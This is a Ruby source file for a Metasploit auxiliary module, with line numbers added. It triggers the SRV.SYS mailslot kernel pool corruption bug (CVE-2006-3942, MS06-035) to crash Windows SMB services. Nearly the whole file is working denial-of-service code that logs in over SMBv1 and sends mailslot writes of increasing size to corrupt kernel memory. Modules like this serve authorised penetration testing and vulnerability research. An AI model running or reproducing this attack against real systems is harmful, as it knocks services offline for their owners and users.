1
##
2
# This module requires Metasploit: https://metasploit.com/download
3
# Current source: https://github.com/rapid7/metasploit-framework
4
##
5

6
class MetasploitModule < Msf::Auxiliary
7
  include Msf::Exploit::Remote::SMB::Client
8
  include Msf::Auxiliary::Dos
9

10
  def initialize(info = {})
11
    super(
12
      update_info(
13
        info,
14
        'Name' => 'Microsoft SRV.SYS Mailslot Write Corruption',
15
        'Description' => %q{
16
          This module triggers a kernel pool corruption bug in SRV.SYS. Each
17
          call to the mailslot write function results in a two byte return value
18
          being written into the response packet. The code which creates this packet
19
          fails to consider these two bytes in the allocation routine, resulting in
20
          a slow corruption of the kernel memory pool. These two bytes are almost
21
          always set to "\xff\xff" (a short integer with value of -1).
22
        },
23

24
        'Author' => [ 'hdm' ],
25
        'License' => MSF_LICENSE,
26
        'References' => [
27
          ['BID', '19215'],
28
          ['OSVDB', '27644'],
29
          ['CVE', '2006-3942'],
30
          ['URL', 'http://www.coresecurity.com/common/showdoc.php?idx=562&idxseccion=10'],
31
          ['MSB', 'MS06-035'],
32
        ],
33
        'Actions' => [
34
          ['Attack', { 'Description' => 'Run Denial of Service' }],
35
        ],
36
        'DefaultAction' => 'Attack',
37
        'DisclosureDate' => '2006-07-11',
38
        'Notes' => {
39
          'Stability' => [CRASH_SERVICE_DOWN],
40
          'SideEffects' => [],
41
          'Reliability' => []
42
        }
43
      )
44
    )
45

46
    register_options(
47
      [
48
        OptString.new('MAILSLOT', [ true, 'The mailslot name to use', 'Alerter']),
49
      ]
50
    )
51

52
    deregister_options('SMB::ProtocolVersion')
53
  end
54

55
  # MAILSLOT: HydraLsServer
56
  # MAILSLOT: Messngr
57
  # MAILSLOT: 53cb31a0\\UnimodemNotifyTSP
58

59
  def run
60
    case action.name
61
    when 'Attack'
62

63
      print_status('Mangling the kernel, two bytes at a time...')
64

65
      connect(versions: [1])
66
      smb_login
67

68
      1.upto(1024) do |i|
69
        if (i % 100 == 0)
70
          print_status("Sending request containing #{i} bytes...")
71
        end
72

73
        begin
74
          simple.client.trans_mailslot('\\MAILSLOT\\' + datastore['MAILSLOT'], 'X' * i)
75
        rescue ::Interrupt
76
          break
77
        rescue StandardError => e
78
          if (i == 1)
79
            print_error("Failed to write any data to the mailslot: #{e}")
80
            break
81
          end
82
          print_error("Exception occurred on iteration #{i}")
83
          print_error("Error: #{e.class} > #{e}")
84
          break
85
        end
86
      end
87

88
      # Errors:
89
      #  0xc0000034 = object not found
90
      #  0xc0000205 = insufficient resources (too much data)
91

92
    end
93

94
    disconnect
95
  end
96
end
97

98